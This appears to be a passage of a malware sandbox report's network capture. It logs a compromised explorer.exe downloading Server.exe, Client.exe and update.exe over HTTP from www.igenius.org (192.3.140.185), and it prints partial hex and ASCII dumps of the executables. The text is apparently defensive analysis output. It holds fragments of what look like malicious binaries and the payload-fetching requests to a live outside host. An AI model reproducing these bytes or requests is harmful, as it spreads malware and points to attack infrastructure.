                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e3 77 83 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b2 02 00 00 08 00 00 00 00 00 00 be d1 02 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c d1 02 00 4f 00 00 00 00 e0 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELwf @ `lO H.text `.rsrc@@.reloc@BHC****rp************6rpo*****"s^*>sf%}"***0soo*0soo*sV*2osR*2osL*0/#o ((,*#*N((o*"o"i*&lo#*"o"k*&lo#*0"o(,*o( [TRUNCATED]
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451745987 CEST1236INData Raw: 00 00 5a 02 03 2d 07 72 03 00 00 70 2b 05 72 0f 00 00 70 6f 07 00 00 06 2a 00 13 30 02 00 17 00 00 00 04 00 00 11 16 6a 0a 02 6f 06 00 00 06 12 00 28 0a 00 00 0a 2c 02 06 2a 16 6a 2a 00 3a 02 0f 01 28 0b 00 00 0a 6f 07 00 00 06 2a 00 1e 02 75 0c
                                                                                                                                                                                                                                Data Ascii: Z-rp+rpo*0jo(,*j*:(o*u*u*s*J(;-o**s*j(;-o"*#*"ls*Z(;-o&*"*"ls*J(;-o$**r~,(s
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451762915 CEST1236INData Raw: 00 00 0a 26 38 90 02 00 00 06 73 80 00 00 06 6f 1a 00 00 0a 07 14 28 3c 00 00 06 2c 0e 07 11 04 06 6f 1b 00 00 0a 6f 11 00 00 06 72 01 00 00 70 13 04 09 16 6f 0f 00 00 0a 06 6f 1b 00 00 0a 0b 38 54 02 00 00 11 05 2c 13 09 02 08 6f 13 00 00 0a 6f
                                                                                                                                                                                                                                Data Ascii: &8so(<,oorpoo8T,oo&8=o-rYpszo&o`,o(Aorpoo>o8,oo&8oo8
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451801062 CEST1236INData Raw: 00 06 2a 00 00 00 52 02 14 7d 1a 00 00 04 02 7c 1b 00 00 04 fe 15 05 00 00 02 2a 00 00 00 32 02 7b 1a 00 00 04 73 56 00 00 06 2a 00 00 00 82 02 7b 1a 00 00 04 14 28 3c 00 00 06 2c 11 02 02 7b 1a 00 00 04 6f 1e 00 00 06 7d 1b 00 00 04 2a 00 00 00
                                                                                                                                                                                                                                Data Ascii: *R}|*2{sV*{(<,{o}*2{sV*f("}(-}**0{,*}*{*s2z{*0+{3{(-3}+s^
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451812983 CEST896INData Raw: 5b 6f 16 00 00 0a 26 02 7b 25 00 00 04 6f 37 00 00 0a 0a 02 7b 26 00 00 04 2c 03 16 10 04 16 0b 2b 46 07 16 31 09 03 1f 2c 6f 16 00 00 0a 26 0e 04 17 33 07 03 6f 3f 00 00 0a 26 0e 04 17 33 0c 03 1f 20 04 05 58 6f 40 00 00 0a 26 02 7b 25 00 00 04
                                                                                                                                                                                                                                Data Ascii: [o&{%o7{&,+F1,o&3o?&3 Xo@&{%o8XoX23o? o@&]o&*JsA}%(C*f("}'(-})*0{'.3(*
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451824903 CEST1236INData Raw: 45 00 00 0a 2a 02 7b 2c 00 00 04 03 04 6f 46 00 00 0a 2a 02 7b 2c 00 00 04 28 49 00 00 0a 0a 12 00 fe 16 23 00 00 01 6f 04 00 00 0a 04 6f 46 00 00 0a 2a 00 00 00 aa 02 7b 2c 00 00 04 03 6f 43 00 00 0a 2d 02 14 2a 02 7b 2c 00 00 04 03 6f 44 00 00
                                                                                                                                                                                                                                Data Ascii: E*{,oF*{,(I#ooF*{,oC-*{,oD{,oJ&*0<2{,oG2*{,(+{,(*oJ&(*0Ms}.{,sK(+(+{,(*oJ&
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451837063 CEST1236INData Raw: 7b 34 00 00 04 28 40 00 00 06 6f 14 00 00 0a 1f 22 6f 16 00 00 0a 26 2a 00 00 13 30 02 00 46 00 00 00 1b 00 00 11 02 03 28 3d 00 00 06 2c 02 17 2a 03 75 0e 00 00 01 0a 06 2c 0d 02 7b 34 00 00 04 06 28 18 00 00 0a 2a 03 75 11 00 00 02 0b 07 14 28
                                                                                                                                                                                                                                Data Ascii: {4(@o"o&*0F(=,*u,{4(*u(<,{4{4(**2{4o***0*F|5((*0 ((,}5*{5*"}5*"{5
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451848030 CEST448INData Raw: 00 06 28 06 00 00 2b 26 22 00 00 00 00 2a 3e 02 03 6c 73 bc 00 00 06 28 06 00 00 2b 26 2a 7e 02 23 00 00 00 00 00 00 00 00 73 bc 00 00 06 28 06 00 00 2b 26 23 00 00 00 00 00 00 00 00 2a 3a 02 03 73 bc 00 00 06 28 06 00 00 2b 26 2a 00 ca 7e 0e 00
                                                                                                                                                                                                                                Data Ascii: (+&"*>ls(+&*~#s(+&#*:s(+&*~,rps(+&+#s(+&j*~,(s(+&*ls(+&*>s(+&*:s(+&*2s(+*2s(+*6rO
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451929092 CEST1236INData Raw: de 00 20 88 13 00 00 28 56 00 00 0a 2b dd 01 1c 00 00 00 00 3d 00 59 96 00 03 02 00 00 01 00 00 9a 00 13 ad 00 03 02 00 00 01 1b 30 01 00 55 00 00 00 00 00 00 00 72 17 01 00 70 28 5a 00 00 0a 7e 3b 00 00 04 28 5b 00 00 0a 2d 0d 7e 3b 00 00 04 28
                                                                                                                                                                                                                                Data Ascii: (V+=Y0Urp(Z~;([-~;(\&+~;(4&rSp(Z~;(,~;*rp*$0("*0C(%~P%rp%~Q%rp%~R(](^;
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451982021 CEST1236INData Raw: 9d 6f 72 00 00 0a 16 9a 6f 11 00 00 0a 0c 06 08 6f 7b 00 00 0a 16 8d 40 00 00 01 6f 7c 00 00 0a 16 8d 40 00 00 01 6f 7d 00 00 0a 0a de 0a 07 2c 06 07 6f 2f 00 00 0a dc de 03 26 de 00 06 2a 00 00 00 01 28 00 00 02 00 22 00 27 49 00 0a 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: oroo{@o|@o},o/&*("'I0E ~~r$por\%poorr%po,rz%pr%p&r%p**::V(r%p((m*0U!r
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.456692934 CEST1236INData Raw: 00 0a 6f 98 00 00 0a 0b de 0c 11 08 2c 07 11 08 6f 2f 00 00 0a dc de 13 26 72 88 27 00 70 08 28 91 00 00 0a 13 09 dd 5e 01 00 00 07 72 98 27 00 70 6f 81 00 00 0a 2d 0c 72 88 27 00 70 08 28 91 00 00 0a 2a 16 13 06 07 17 8d 40 00 00 01 25 16 1f 20
                                                                                                                                                                                                                                Data Ascii: o,o/&r'p(^r'po-r'p(*@% or+xX%r'po,r'prpo%r'po,r'prpor'po,r'prpoXi2%r'p%


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                7192.168.2.449747192.3.140.185802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.009499073 CEST141OUTGET /Server.exe HTTP/1.1
                                                                                                                                                                                                                                Host: www.igenius.org
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630492926 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Sat, 06 Jul 2024 11:27:18 GMT
                                                                                                                                                                                                                                content-type: application/x-msdownload
                                                                                                                                                                                                                                content-length: 179200
                                                                                                                                                                                                                                server: nginx
                                                                                                                                                                                                                                last-modified: Tue, 02 Jul 2024 10:09:37 GMT
                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e3 77 83 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b2 02 00 00 08 00 00 00 00 00 00 be d1 02 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c d1 02 00 4f 00 00 00 00 e0 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELwf @ `lO H.text `.rsrc@@.reloc@BHC****rp************6rpo*****"s^*>sf%}"***0soo*0soo*sV*2osR*2osL*0/#o ((,*#*N((o*"o"i*&lo#*"o"k*&lo#*0"o(,*o( [TRUNCATED]
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630513906 CEST224INData Raw: 00 00 5a 02 03 2d 07 72 03 00 00 70 2b 05 72 0f 00 00 70 6f 07 00 00 06 2a 00 13 30 02 00 17 00 00 00 04 00 00 11 16 6a 0a 02 6f 06 00 00 06 12 00 28 0a 00 00 0a 2c 02 06 2a 16 6a 2a 00 3a 02 0f 01 28 0b 00 00 0a 6f 07 00 00 06 2a 00 1e 02 75 0c
                                                                                                                                                                                                                                Data Ascii: Z-rp+rpo*0jo(,*j*:(o*u*u*s*J(;-o**s*j(;-o"*#*"ls*Z(;-o&*"*"ls*J(;-o$*
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630523920 CEST1236INData Raw: 2a 00 72 7e 0e 00 00 04 2c 0d 0f 00 28 0b 00 00 0a 73 ae 00 00 06 2a 02 6c 73 bc 00 00 06 2a 00 00 00 4e 02 14 28 3b 00 00 06 2d 07 02 6f 2a 00 00 06 2a 16 6a 2a 1e 02 73 ca 00 00 06 2a 4a 02 14 28 3b 00 00 06 2d 07 02 6f 28 00 00 06 2a 16 2a 00
                                                                                                                                                                                                                                Data Ascii: *r~,(s*ls*N(;-o**j*s*J(;-o(**"(*0J3*u-,u+u-,u+_,*-o**.(;**(*^~-s~*0A
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630542994 CEST224INData Raw: 04 09 16 6f 0f 00 00 0a 16 13 06 38 a9 01 00 00 11 05 16 fe 01 13 05 11 06 11 05 60 13 06 38 96 01 00 00 11 05 2c 13 09 02 08 6f 13 00 00 0a 6f 16 00 00 0a 26 38 7f 01 00 00 09 6f 1f 00 00 0a 16 fe 02 11 06 60 2c 15 07 11 04 09 6f 04 00 00 0a 11
                                                                                                                                                                                                                                Data Ascii: o8`8,oo&8o`,o(Aorpo8C9<oo&8)X9of5b.Wf.^8n.8rYEmG+k
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630759001 CEST1236INData Raw: 6f 16 00 00 0a 26 38 ce 00 00 00 09 1f 0d 6f 16 00 00 0a 26 38 c0 00 00 00 09 1f 0a 6f 16 00 00 0a 26 38 b2 00 00 00 09 1e 6f 16 00 00 0a 26 38 a5 00 00 00 09 1f 0c 6f 16 00 00 0a 26 38 97 00 00 00 02 08 17 58 1a 6f 20 00 00 0a 13 09 09 11 09 20
                                                                                                                                                                                                                                Data Ascii: o&8o&8o&8o&8o&8Xo (!o&X+qo&+f~,A-=Xo/2Xo/3%X%o/6o.+o3+oo&+oo&Xo?K,rps
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630779982 CEST1236INData Raw: 00 04 6f 31 00 00 0a 0d 02 09 6f 18 00 00 06 6f 34 00 00 0a 7d 24 00 00 04 02 1f fc 7d 1f 00 00 04 2b 28 02 7b 24 00 00 04 6f 31 00 00 0a 13 04 02 11 04 7d 20 00 00 04 02 17 7d 1f 00 00 04 17 0a de 47 02 1f fc 7d 1f 00 00 04 02 7b 24 00 00 04 6f
                                                                                                                                                                                                                                Data Ascii: o1oo4}$}+({$o1} }G}{$o0-(j}${#o0-(i}#(g*n}{#,{#o/*r}{$,{$o/*{ *s2z{ *
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630841970 CEST1236INData Raw: 04 2a 1a 73 32 00 00 0a 7a 00 1e 02 7b 28 00 00 04 2a 13 30 02 00 37 00 00 00 11 00 00 11 02 7b 27 00 00 04 1f fe 33 18 02 7b 29 00 00 04 28 2d 00 00 0a 33 0b 02 16 7d 27 00 00 04 02 0a 2b 13 16 73 81 00 00 06 0a 06 02 7b 2a 00 00 04 7d 2a 00 00
                                                                                                                                                                                                                                Data Ascii: *s2z{(*07{'3{)(-3}'+s{*}**(*{-*"}-***F{,oBsG*{,oC,{,oD*s*(;,({,oC,{,oE*{,oF*0)
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630865097 CEST1236INData Raw: 00 00 0a 00 00 11 02 7b 2f 00 00 04 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 a3 00 00 06 dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 02 00 93 00 00 00 18 00 00 11 02 7b 2f 00 00 04 0b 02 7b 32 00 00 04 0c 07 2c 08 07 17 2e
                                                                                                                                                                                                                                Data Ascii: {/.3(*0{/{2,.Jx}/{,oB}3}/+,|3('(}0}/2}/|3()-(|3(*f}/|3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630945921 CEST1236INData Raw: 2a 00 0a 17 2a 00 13 30 01 00 0a 00 00 00 1a 00 00 11 12 00 fe 15 05 00 00 02 06 2a 00 00 1a 72 4f 00 00 70 2a 00 06 2a 00 00 0a 16 2a 00 06 2a 00 00 1a 28 d0 00 00 06 2a 00 42 02 03 33 02 17 2a 03 75 14 00 00 02 14 fe 03 2a 00 00 00 0a 16 2a 00
                                                                                                                                                                                                                                Data Ascii: **0*rOp****(*B3*u**6rOpo&*Fs78**0*V(C}9}:*V(C}9}:*{:-{9o+{9{:o
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630958080 CEST1236INData Raw: 00 00 04 7e 3e 00 00 04 6f 50 03 00 06 80 3e 00 00 04 7e 4a 00 00 04 7e 3f 00 00 04 6f 50 03 00 06 80 3f 00 00 04 7e 4a 00 00 04 7e 40 00 00 04 6f 50 03 00 06 80 40 00 00 04 7e 4a 00 00 04 7e 41 00 00 04 6f 50 03 00 06 80 41 00 00 04 7e 4a 00 00
                                                                                                                                                                                                                                Data Ascii: ~>oP>~J~?oP?~J~@oP@~J~AoPA~J~EoPE~J~KoPK~J~IoPI~J~LoPL~J~OoPO(M~J~GoPG~J~FoP(`sbH(
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.635445118 CEST1236INData Raw: 00 0a 00 00 00 00 00 00 00 00 4a 4a 00 03 02 00 00 01 1b 30 03 00 d1 00 00 00 20 00 00 11 28 83 00 00 0a 7e 55 00 00 04 25 2d 17 26 7e 54 00 00 04 fe 06 16 01 00 06 73 84 00 00 0a 25 80 55 00 00 04 28 09 00 00 2b 7e 56 00 00 04 25 2d 17 26 7e 54
                                                                                                                                                                                                                                Data Ascii: JJ0 (~U%-&~Ts%U(+~V%-&~Ts%V(+~W%-&~Ts%W(+~X%-&~Ts%X(+~Y%-&~Ts%Y(+(+o&rf$p**


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                8192.168.2.449750192.3.140.185802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.962368965 CEST141OUTGET /Client.exe HTTP/1.1
                                                                                                                                                                                                                                Host: www.igenius.org
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Jul 6, 2024 13:27:19.564568043 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Sat, 06 Jul 2024 11:27:19 GMT
                                                                                                                                                                                                                                content-type: application/x-msdownload
                                                                                                                                                                                                                                content-length: 328192
                                                                                                                                                                                                                                server: nginx
                                                                                                                                                                                                                                last-modified: Tue, 02 Jul 2024 17:49:14 GMT
                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f4 3e b0 62 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 f6 04 00 00 0a 00 00 00 00 00 00 1e 15 05 00 00 20 00 00 00 20 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 14 05 00 4f 00 00 00 00 20 05 00 16 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL>b"0 @ ``O @ H.text$ `.rsrc @@.reloc@@BHtXZ@oqwypO rPWS[QYUA]@PXT!\ RZV`PWS[QYUa]`PXT1\0RZV` [TRUNCATED]
                                                                                                                                                                                                                                Jul 6, 2024 13:27:19.564651966 CEST224INData Raw: 00 00 09 00 00 00 06 00 00 00 0a 00 00 00 05 00 00 00 0b 00 00 00 04 00 00 00 0c 00 00 00 03 00 00 00 0d 00 00 00 02 00 00 00 0e 00 00 00 01 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 04 00 00 00 05 00 00 00
                                                                                                                                                                                                                                Data Ascii: (08@P`p
                                                                                                                                                                                                                                Jul 6, 2024 13:27:19.564661980 CEST1236INData Raw: 0a 0a 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d
                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                Jul 6, 2024 13:27:19.564717054 CEST1236INData Raw: 05 00 1a 00 05 00 06 00 05 00 16 00 05 00 0e 00 05 00 1e 00 05 00 01 00 05 00 11 00 05 00 09 00 05 00 19 00 05 00 05 00 05 00 15 00 05 00 0d 00 05 00 1d 00 05 00 03 00 05 00 13 00 05 00 0b 00 05 00 1b 00 05 00 07 00 05 00 17 00 05 00 03 00 00 00
                                                                                                                                                                                                                                Data Ascii: #+3;CScshttps://githu
                                                                                                                                                                                                                                Jul 6, 2024 13:27:19.564728022 CEST448INData Raw: 00 00 07 00 00 00 00 00 00 00 08 00 00 00 5a 00 00 00 00 00 00 00 08 00 00 00 1a 00 00 00 00 00 00 00 09 00 00 00 94 00 00 00 54 00 00 00 07 00 00 00 43 00 00 00 00 00 00 00 08 00 00 00 7a 00 00 00 00 00 00 00 08 00 00 00 3a 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: ZTCz:Rj*JPVS3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:19.564738035 CEST1236INData Raw: 00 00 00 00 00 00 08 00 00 00 3e 00 00 00 00 00 00 00 09 00 00 00 dc 00 00 00 52 00 00 00 07 00 00 00 1b 00 00 00 00 00 00 00 08 00 00 00 6e 00 00 00 00 00 00 00 08 00 00 00 2e 00 00 00 00 00 00 00 09 00 00 00 bc 00 00 00 00 00 00 00 08 00 00 00
                                                                                                                                                                                                                                Data Ascii: >Rn.N`QURq1Pa
                                                                                                                                                                                                                                Jul 6, 2024 13:27:19.564749002 CEST224INData Raw: 00 00 00 00 00 00 08 00 00 00 8b 00 00 00 00 00 00 00 08 00 00 00 4b 00 00 00 00 00 00 00 09 00 00 00 f6 00 00 00 50 00 00 00 07 00 00 00 05 00 00 00 00 00 00 00 08 00 00 00 57 00 00 00 00 00 00 00 08 00 00 00 17 00 00 00 c0 00 00 00 08 00 00 00
                                                                                                                                                                                                                                Data Ascii: KPWS3w7Qg'G
                                                                                                                                                                                                                                Jul 6, 2024 13:27:19.564762115 CEST1236INData Raw: 00 00 ee 00 00 00 50 00 00 00 07 00 00 00 09 00 00 00 00 00 00 00 08 00 00 00 5f 00 00 00 00 00 00 00 08 00 00 00 1f 00 00 00 00 00 00 00 09 00 00 00 9e 00 00 00 54 00 00 00 07 00 00 00 63 00 00 00 00 00 00 00 08 00 00 00 7f 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: P_Tc?Ro/O`PTs
                                                                                                                                                                                                                                Jul 6, 2024 13:27:19.564816952 CEST1236INData Raw: 00 00 3a 00 00 00 00 00 00 00 09 00 00 00 d5 00 00 00 52 00 00 00 07 00 00 00 13 00 00 00 00 00 00 00 08 00 00 00 6a 00 00 00 00 00 00 00 08 00 00 00 2a 00 00 00 00 00 00 00 09 00 00 00 b5 00 00 00 00 00 00 00 08 00 00 00 0a 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: :Rj*JPVS3v6Qf&
                                                                                                                                                                                                                                Jul 6, 2024 13:27:19.564829111 CEST1236INData Raw: 00 00 8d 00 00 00 00 00 00 00 08 00 00 00 4d 00 00 00 00 00 00 00 09 00 00 00 fb 00 00 00 50 00 00 00 07 00 00 00 03 00 00 00 00 00 00 00 08 00 00 00 53 00 00 00 00 00 00 00 08 00 00 00 13 00 00 00 55 00 00 00 08 00 00 00 c3 00 00 00 53 00 00 00
                                                                                                                                                                                                                                Data Ascii: MPSUS#s3Qc#CP[
                                                                                                                                                                                                                                Jul 6, 2024 13:27:19.569591045 CEST1236INData Raw: 08 00 06 00 08 00 86 00 08 00 46 00 08 00 c6 00 08 00 26 00 08 00 a6 00 08 00 66 00 08 00 e6 00 08 00 16 00 08 00 96 00 08 00 56 00 08 00 d6 00 08 00 36 00 08 00 b6 00 08 00 76 00 08 00 f6 00 08 00 0e 00 08 00 8e 00 08 00 4e 00 08 00 ce 00 08 00
                                                                                                                                                                                                                                Data Ascii: F&fV6vN.n^>~A!aQ1qI)iY9


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                9192.168.2.449752192.3.140.185802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:20.471851110 CEST141OUTGET /update.exe HTTP/1.1
                                                                                                                                                                                                                                Host: www.igenius.org
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.049598932 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Sat, 06 Jul 2024 11:27:20 GMT
                                                                                                                                                                                                                                content-type: application/x-msdownload
                                                                                                                                                                                                                                content-length: 48640
                                                                                                                                                                                                                                server: nginx
                                                                                                                                                                                                                                last-modified: Wed, 03 Jul 2024 05:25:35 GMT
                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e5 ad 2d 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b2 00 00 00 0a 00 00 00 00 00 00 4e d0 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 cf 00 00 57 00 00 00 00 e0 00 00 ff 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL-eN @ @W H.textT `.rsrc@@.reloc@B0HYvV;$0xC=VDb9A./\(*~**~**~**~**~**~**~**~*~**~**~***(>*2~o?*.s*():((*:(+:(':((9(v*V(s o*n~9~o*~~(9(09(@*VrN%p~(o#*s%r!po [TRUNCATED]
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.049614906 CEST1236INData Raw: 00 70 6f 8c 00 00 06 6f 89 00 00 06 28 20 00 00 06 20 e8 03 00 00 28 14 00 00 0a 2a da 73 94 00 00 06 25 72 02 21 00 70 6f 7f 00 00 06 72 0c 26 00 70 6f 8c 00 00 06 25 72 0c 26 00 70 6f 7f 00 00 06 02 6f 8c 00 00 06 6f 89 00 00 06 28 20 00 00 06
                                                                                                                                                                                                                                Data Ascii: poo( (*s%r!por&po%r&pooo( *.s$*^(o(M(*^(((Oo*b D%-(,*2~.o*2~.o*2((X*D%%c%c%c*
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.049626112 CEST1236INData Raw: 00 00 20 88 13 00 00 28 14 00 00 0a 2b d4 00 00 00 01 1c 00 00 00 00 33 00 60 93 00 06 01 00 00 01 00 00 9a 00 19 b3 00 06 01 00 00 01 1b 30 02 00 2d 01 00 00 02 00 00 11 28 19 00 00 0a 7e 07 00 00 04 28 1a 00 00 0a 6f 1b 00 00 0a 80 07 00 00 04
                                                                                                                                                                                                                                Data Ascii: (+3`0-(~(o~sK~~oN~~oN~~oN~~oN~~oN~~oN~~oN~~
